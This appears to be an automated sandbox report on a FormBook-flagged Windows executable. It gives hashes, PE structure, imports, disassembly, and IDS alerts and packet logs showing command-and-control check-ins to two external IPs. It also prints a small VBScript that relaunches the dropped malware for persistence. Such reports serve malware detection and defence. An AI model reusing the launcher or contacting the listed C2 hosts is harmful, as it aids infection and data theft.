                                                SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                Malicious:false
                                                Process:C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe
                                                File Type:data
                                                Category:modified
                                                Size (bytes):288
                                                Entropy (8bit):3.457128496333936
                                                Encrypted:false
                                                SSDEEP:6:DMM8lfm3OOQdUfclMMlW8g1UEZ+lX1Mf7eAlDi7nriIM8lfQVn:DsO+vNlMkXg1Q1ESAh2mA2n
                                                MD5:BDCEE1825095500243F0C12802690DD8
                                                SHA1:39C7D445DAE72AF3D8D0EB3B2EE7219CD6A87DA5
                                                SHA-256:2603680D948357D1BA7E9BE1C3730800F879830A6BCB585F23D1A57A95BDF04D
                                                SHA-512:A64282D90A757163EC534C3371810F5DBF3C51993E1209D0B7BF3CC1C9BB21E40145ADF4806EB5DB5A4842B4E961A0130928390746C5BDFA8DEE6AC14E4FA0F3
                                                Malicious:true
Preview (UTF-16LE text, decoded):
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run "C:\Users\frontdesk\AppData\Local\Dalymore\fricandeaus.exe", 1
Set WshShell = Nothing
                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                Entropy (8bit):7.147712317212054
                                                TrID:
                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                • DOS Executable Generic (2002/1) 0.02%
                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                File name:25Lz840Dmh.exe
                                                File size:1'169'920 bytes
                                                MD5:6c35b069b37095a1788e5c7b51a60e97
                                                SHA1:3b36ef6c51bb8094729bae419675a2aa21bc6d23
                                                SHA256:232aba52f171fefbb08cdf88d9fafc571394cf8ec159081d5f9cad2ea2f7669c
                                                SHA512:06e30105a7cefd397d1c436c9eec0d477fe505475054cb8e2d8e977e6959fa600dbdc6895c76bbda330af742bec54f0eed477faa40b869dda45e41f183c23854
                                                SSDEEP:24576:Wu6J33O0c+JY5UZ+XC0kGso6Fa+bh6PgHDpASu6iBf/1RvYB+WY:4u0c++OCvkGs9Fa+b3DSZ6wf/1AY
                                                TLSH:0B45CF2273DEC360CB769273BF69B7016EBF78614630B85B2F880D79A950171162D7A3
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.
                                                Icon Hash:aaf3e3e3938382a0
                                                Entrypoint:0x427dcd
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                Time Stamp:0x675A767D [Thu Dec 12 05:37:01 2024 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:5
                                                OS Version Minor:1
                                                File Version Major:5
                                                File Version Minor:1
                                                Subsystem Version Major:5
                                                Subsystem Version Minor:1
                                                Import Hash:afcdf79be1557326c854b6e20cb900a7
                                                Instruction
                                                call 00007F4508EA804Ah
                                                jmp 00007F4508E9AE14h
                                                int3
                                                int3
                                                int3
                                                int3
                                                int3
                                                int3
                                                int3
                                                int3
                                                int3
                                                push edi
                                                push esi
                                                mov esi, dword ptr [esp+10h]
                                                mov ecx, dword ptr [esp+14h]
                                                mov edi, dword ptr [esp+0Ch]
                                                mov eax, ecx
                                                mov edx, ecx
                                                add eax, esi
                                                cmp edi, esi
                                                jbe 00007F4508E9AF9Ah
                                                cmp edi, eax
                                                jc 00007F4508E9B2FEh
                                                bt dword ptr [004C31FCh], 01h
                                                jnc 00007F4508E9AF99h
                                                rep movsb
                                                jmp 00007F4508E9B2ACh
                                                cmp ecx, 00000080h
                                                jc 00007F4508E9B164h
                                                mov eax, edi
                                                xor eax, esi
                                                test eax, 0000000Fh
                                                jne 00007F4508E9AFA0h
                                                bt dword ptr [004BE324h], 01h
                                                jc 00007F4508E9B470h
                                                bt dword ptr [004C31FCh], 00000000h
                                                jnc 00007F4508E9B13Dh
                                                test edi, 00000003h
                                                jne 00007F4508E9B14Eh
                                                test esi, 00000003h
                                                jne 00007F4508E9B12Dh
                                                bt edi, 02h
                                                jnc 00007F4508E9AF9Fh
                                                mov eax, dword ptr [esi]
                                                sub ecx, 04h
                                                lea esi, dword ptr [esi+04h]
                                                mov dword ptr [edi], eax
                                                lea edi, dword ptr [edi+04h]
                                                bt edi, 03h
                                                jnc 00007F4508E9AFA3h
                                                movq xmm1, qword ptr [esi]
                                                sub ecx, 08h
                                                lea esi, dword ptr [esi+08h]
                                                movq qword ptr [edi], xmm1
                                                lea edi, dword ptr [edi+08h]
                                                test esi, 00000007h
                                                je 00007F4508E9AFF5h
                                                bt esi, 03h
                                                jnc 00007F4508E9B048h
                                                Programming Language:
                                                • [ASM] VS2013 build 21005
                                                • [ C ] VS2013 build 21005
                                                • [C++] VS2013 build 21005
                                                • [ C ] VS2008 SP1 build 30729
                                                • [IMP] VS2008 SP1 build 30729
                                                • [ASM] VS2013 UPD4 build 31101
                                                • [RES] VS2013 build 21005
                                                • [LNK] VS2013 UPD4 build 31101
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xba44c | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc7000 | 0x5514c | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x11d000 | 0x711c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x92bc0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xa4870 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8f000 | 0x884 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8dcc4 | 0x8de00 | d28a820a1d9ff26cda02d12b888ba4b4 | False | 0.5728679102422908 | data | 6.676118058520316 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8f000 | 0x2e10e | 0x2e200 | 79b14b254506b0dbc8cd0ad67fb70ad9 | False | 0.33535526761517614 | OpenPGP Public Key | 5.76010872795207 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xbe000 | 0x8f74 | 0x5200 | 9f9d6f746f1a415a63de45f8b7983d33 | False | 0.1017530487804878 | data | 1.198745897703538 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xc7000 | 0x5514c | 0x55200 | 87cb67ba824ceae4f28f23cfecd662e7 | False | 0.9229304331864905 | data | 7.882509985996072 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x11d000 | 0x711c | 0x7200 | 6fcae3cbbf6bfbabf5ec5bbe7cf612c3 | False | 0.7650767543859649 | data | 6.779031650454199 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xc75a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xc76d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xc77f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xc7920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
RT_ICON | 0xc7c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
RT_ICON | 0xc7d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
RT_ICON | 0xc8bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
RT_ICON | 0xc9480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
RT_ICON | 0xc99e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
RT_ICON | 0xcbf90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
RT_ICON | 0xcd038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
RT_MENU | 0xcd4a0 | 0x50 | data | English | Great Britain | 0.9
RT_STRING | 0xcd4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xcda84 | 0x68a | data | English | Great Britain | 0.2747909199522103
RT_STRING | 0xce110 | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xce5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xceb9c | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xcf1f8 | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xcf660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xcf7b8 | 0x4c414 | data | | | 1.0003393737593649
RT_GROUP_ICON | 0x11bbcc | 0x76 | data | English | Great Britain | 0.6610169491525424
RT_GROUP_ICON | 0x11bc44 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0x11bc58 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0x11bc6c | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0x11bc80 | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x11bd5c | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
DLL: Imports
WSOCK32.dll: WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll: GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll: timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll: ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll: WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll: InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL: GetProcessMemoryInfo
IPHLPAPI.DLL: IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll: DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll: IsThemeActive
KERNEL32.dll: DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll: AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll: StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll: GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll: GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll: DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll: CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll: LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
Language of compilation system | Country where language is spoken | Map
English | Great Britain |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-10T21:07:05.933875+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.7 | 50255 | 3.33.130.190 | 80 | TCP
2025-01-10T21:07:26.470361+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 50256 | 3.33.130.190 | 80 | TCP
2025-01-10T21:07:29.036634+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 50257 | 3.33.130.190 | 80 | TCP
2025-01-10T21:07:31.571060+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 50258 | 3.33.130.190 | 80 | TCP
2025-01-10T21:07:34.215997+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.7 | 50259 | 3.33.130.190 | 80 | TCP
2025-01-10T21:07:48.290034+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 50260 | 8.217.17.192 | 80 | TCP
2025-01-10T21:07:50.866665+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 50261 | 8.217.17.192 | 80 | TCP
2025-01-10T21:07:53.386866+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 50262 | 8.217.17.192 | 80 | TCP
2025-01-10T21:07:56.497863+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.7 | 50263 | 8.217.17.192 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 10, 2025 21:06:55.311851978 CET | 50250 | 53 | 192.168.2.7 | 162.159.36.2
Jan 10, 2025 21:06:55.316732883 CET | 53 | 50250 | 162.159.36.2 | 192.168.2.7
Jan 10, 2025 21:06:55.316890001 CET | 50250 | 53 | 192.168.2.7 | 162.159.36.2
Jan 10, 2025 21:06:55.321872950 CET | 53 | 50250 | 162.159.36.2 | 192.168.2.7
Jan 10, 2025 21:06:55.831964016 CET | 50250 | 53 | 192.168.2.7 | 162.159.36.2
Jan 10, 2025 21:06:55.837405920 CET | 53 | 50250 | 162.159.36.2 | 192.168.2.7
Jan 10, 2025 21:06:55.837507963 CET | 50250 | 53 | 192.168.2.7 | 162.159.36.2
Jan 10, 2025 21:07:04.511502981 CET | 50255 | 80 | 192.168.2.7 | 3.33.130.190
Jan 10, 2025 21:07:04.696399927 CET | 80 | 50255 | 3.33.130.190 | 192.168.2.7
Jan 10, 2025 21:07:04.696511984 CET | 50255 | 80 | 192.168.2.7 | 3.33.130.190
Jan 10, 2025 21:07:04.713511944 CET | 50255 | 80 | 192.168.2.7 | 3.33.130.190
Jan 10, 2025 21:07:04.719037056 CET | 80 | 50255 | 3.33.130.190 | 192.168.2.7
Jan 10, 2025 21:07:05.933609009 CET | 80 | 50255 | 3.33.130.190 | 192.168.2.7
Jan 10, 2025 21:07:05.933621883 CET | 80 | 50255 | 3.33.130.190 | 192.168.2.7
Jan 10, 2025 21:07:05.933875084 CET | 50255 | 80 | 192.168.2.7 | 3.33.130.190
Jan 10, 2025 21:07:05.935020924 CET | 80 | 50255 | 3.33.130.190 | 192.168.2.7
Jan 10, 2025 21:07:05.935055017 CET | 80 | 50255 | 3.33.130.190 | 192.168.2.7
Jan 10, 2025 21:07:05.935064077 CET | 50255 | 80 | 192.168.2.7 | 3.33.130.190
Jan 10, 2025 21:07:05.935079098 CET | 80 | 50255 | 3.33.130.190 | 192.168.2.7
Jan 10, 2025 21:07:05.935116053 CET | 50255 | 80 | 192.168.2.7 | 3.33.130.190
Jan 10, 2025 21:07:05.937205076 CET | 50255 | 80 | 192.168.2.7 | 3.33.130.190
Jan 10, 2025 21:07:05.937205076 CET | 50255 | 80 | 192.168.2.7 | 3.33.130.190
Jan 10, 2025 21:07:05.958192110 CET | 80 | 50255 | 3.33.130.190 | 192.168.2.7
Jan 10, 2025 21:07:26.010118961 CET | 50256 | 80 | 192.168.2.7 | 3.33.130.190
Jan 10, 2025 21:07:26.014940023 CET | 80 | 50256 | 3.33.130.190 | 192.168.2.7
Jan 10, 2025 21:07:26.015017986 CET | 50256 | 80 | 192.168.2.7 | 3.33.130.190
Jan 10, 2025 21:07:26.025995016 CET | 50256 | 80 | 192.168.2.7 | 3.33.130.190
Jan 10, 2025 21:07:26.030796051 CET | 80 | 50256 | 3.33.130.190 | 192.168.2.7
Jan 10, 2025 21:07:26.470170021 CET | 80 | 50256 | 3.33.130.190 | 192.168.2.7
Jan 10, 2025 21:07:26.470305920 CET | 80 | 50256 | 3.33.130.190 | 192.168.2.7
Jan 10, 2025 21:07:26.470360994 CET | 50256 | 80 | 192.168.2.7 | 3.33.130.190
Jan 10, 2025 21:07:27.538597107 CET | 50256 | 80 | 192.168.2.7 | 3.33.130.190
Jan 10, 2025 21:07:28.561544895 CET | 50257 | 80 | 192.168.2.7 | 3.33.130.190
Jan 10, 2025 21:07:28.566653013 CET | 80 | 50257 | 3.33.130.190 | 192.168.2.7
Jan 10, 2025 21:07:28.566756010 CET | 50257 | 80 | 192.168.2.7 | 3.33.130.190
Jan 10, 2025 21:07:28.581547976 CET | 50257 | 80 | 192.168.2.7 | 3.33.130.190
Jan 10, 2025 21:07:28.586369991 CET | 80 | 50257 | 3.33.130.190 | 192.168.2.7
Jan 10, 2025 21:07:29.036501884 CET | 80 | 50257 | 3.33.130.190 | 192.168.2.7
Jan 10, 2025 21:07:29.036524057 CET | 80 | 50257 | 3.33.130.190 | 192.168.2.7
Jan 10, 2025 21:07:29.036633968 CET | 50257 | 80 | 192.168.2.7 | 3.33.130.190
Jan 10, 2025 21:07:30.085231066 CET | 50257 | 80 | 192.168.2.7 | 3.33.130.190
Jan 10, 2025 21:07:31.104824066 CET | 50258 | 80 | 192.168.2.7 | 3.33.130.190
Jan 10, 2025 21:07:31.109909058 CET | 80 | 50258 | 3.33.130.190 | 192.168.2.7
Jan 10, 2025 21:07:31.110013008 CET | 50258 | 80 | 192.168.2.7 | 3.33.130.190
Jan 10, 2025 21:07:31.124914885 CET | 50258 | 80 | 192.168.2.7 | 3.33.130.190
Jan 10, 2025 21:07:31.129863977 CET | 80 | 50258 | 3.33.130.190 | 192.168.2.7
Jan 10, 2025 21:07:31.129954100 CET | 80 | 50258 | 3.33.130.190 | 192.168.2.7
Jan 10, 2025 21:07:31.570842028 CET | 80 | 50258 | 3.33.130.190 | 192.168.2.7
Jan 10, 2025 21:07:31.570873976 CET | 80 | 50258 | 3.33.130.190 | 192.168.2.7
Jan 10, 2025 21:07:31.571059942 CET | 50258 | 80 | 192.168.2.7 | 3.33.130.190
Jan 10, 2025 21:07:32.632148981 CET | 50258 | 80 | 192.168.2.7 | 3.33.130.190
Jan 10, 2025 21:07:33.651678085 CET | 50259 | 80 | 192.168.2.7 | 3.33.130.190
Jan 10, 2025 21:07:33.656586885 CET | 80 | 50259 | 3.33.130.190 | 192.168.2.7
Jan 10, 2025 21:07:33.656650066 CET | 50259 | 80 | 192.168.2.7 | 3.33.130.190
Jan 10, 2025 21:07:33.665636063 CET | 50259 | 80 | 192.168.2.7 | 3.33.130.190
Jan 10, 2025 21:07:33.670459032 CET | 80 | 50259 | 3.33.130.190 | 192.168.2.7
Jan 10, 2025 21:07:34.215807915 CET | 80 | 50259 | 3.33.130.190 | 192.168.2.7
Jan 10, 2025 21:07:34.215825081 CET | 80 | 50259 | 3.33.130.190 | 192.168.2.7
Jan 10, 2025 21:07:34.215836048 CET | 80 | 50259 | 3.33.130.190 | 192.168.2.7
Jan 10, 2025 21:07:34.215996981 CET | 50259 | 80 | 192.168.2.7 | 3.33.130.190
Jan 10, 2025 21:07:34.219747066 CET | 50259 | 80 | 192.168.2.7 | 3.33.130.190
Jan 10, 2025 21:07:34.224559069 CET | 80 | 50259 | 3.33.130.190 | 192.168.2.7
Jan 10, 2025 21:07:47.365675926 CET | 50260 | 80 | 192.168.2.7 | 8.217.17.192
Jan 10, 2025 21:07:47.370520115 CET | 80 | 50260 | 8.217.17.192 | 192.168.2.7
Jan 10, 2025 21:07:47.370594025 CET | 50260 | 80 | 192.168.2.7 | 8.217.17.192
Jan 10, 2025 21:07:47.382741928 CET | 50260 | 80 | 192.168.2.7 | 8.217.17.192
